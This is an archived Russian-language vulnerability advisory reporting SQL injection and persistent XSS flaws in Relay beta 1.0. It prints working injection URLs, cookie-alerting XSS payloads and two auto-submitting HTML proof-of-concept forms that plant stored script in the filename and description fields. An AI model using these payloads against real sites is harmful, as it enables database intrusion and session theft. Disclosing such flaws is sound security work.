Lucene search

K
securityvulnsSecurityvulnsSECURITYVULNS:DOC:18909
HistoryJan 21, 2008 - 12:00 a.m.

Vulnerabilities in Relay

2008-01-2100:00:00
vulners.com
16

Здравствуйте 3APA3A!

Сообщаю вам о найденных мною SQL Injection и Cross-Site Scripting уязвимостях в движке Relay.

SQL Injection:

http://site/relay/relay.php?relay=getFile&fileid=-1%20or%20id=1151513788

http://site/relay/relay.php?relay=getFile&fileid=1151513788%20and%20substring(version(),1,1)=3

XSS (Persistent):

На странице http://site/relay/relay.html

<img src='' onerror='javascript:alert(document.cookie)'>
В поле: name.

PoC:

relay XSS.html

<body onLoad="document.hack.submit()">
<form name="hack" action="http://site/relay/relay.php&quot; method="post">
<input type="hidden" name="relay" value="setMeta">
<input type="hidden" name="fileid" value="1151513788">
<input type="hidden" name="filename" value="relay bird.jpg<img src='' onerror='javascript:alert(document.cookie)'>">
<input type="hidden" name="description" value="">
<input type="hidden" name="flags" value="normal">
</form>
</body>

На странице http://site/relay/relay.html

</textarea><img src='' onerror='javascript:alert(document.cookie)'>
В поле: description.

PoC:

relay XSS2.html

<body onLoad="document.hack.submit()">
<form name="hack" action="http://site/relay/relay.php&quot; method="post">
<input type="hidden" name="relay" value="setMeta">
<input type="hidden" name="fileid" value="1151513788">
<input type="hidden" name="filename" value="relay bird.jpg">
<input type="hidden" name="description" value="</textarea><img src='' onerror='javascript:alert(document.cookie)'>">
<input type="hidden" name="flags" value="normal">
</form>
</body>

XSS:

На странице http://site/relay/relay.html

<img src='' onerror='javascript:alert(document.cookie)'>
В поле searchbar.

Уязвима версия Relay beta 1.0.

Дополнительная информация о данных уязвимостях у меня на сайте:
http://websecurity.com.ua/1485/

Best wishes & regards,
MustLive
Администратор сайта
http://websecurity.com.ua